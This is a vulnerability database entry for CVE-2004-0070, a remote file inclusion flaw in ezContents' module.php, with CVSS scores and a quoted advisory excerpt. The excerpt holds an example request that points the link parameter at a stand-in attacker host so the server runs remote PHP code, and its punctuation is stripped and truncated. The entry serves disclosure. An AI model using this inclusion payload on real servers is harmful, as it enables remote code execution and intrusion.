7.5
CVSSv2

CVE-2004-0070

Published: 17/02/2004 Updated: 10/10/2017
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

PHP remote file inclusion vulnerability in module.php for ezContents allows remote malicious users to execute arbitrary PHP code by modifying the link parameter to reference a URL on a remote web server that contains the code.

Vulnerable Product Search on Vulmon Subscribe to Product

visualshapers ezcontents

Exploits

source: wwwsecurityfocuscom/bid/9396/info A problem in handling of specific types of input passed to the modulephp script in VisualShapers ezContents has been discovered Because of this, an attacker may be able to gain unauthorized access to vulnerable systems wwwexamplecom/modulephp?link=attackerexamplecom/indexph ...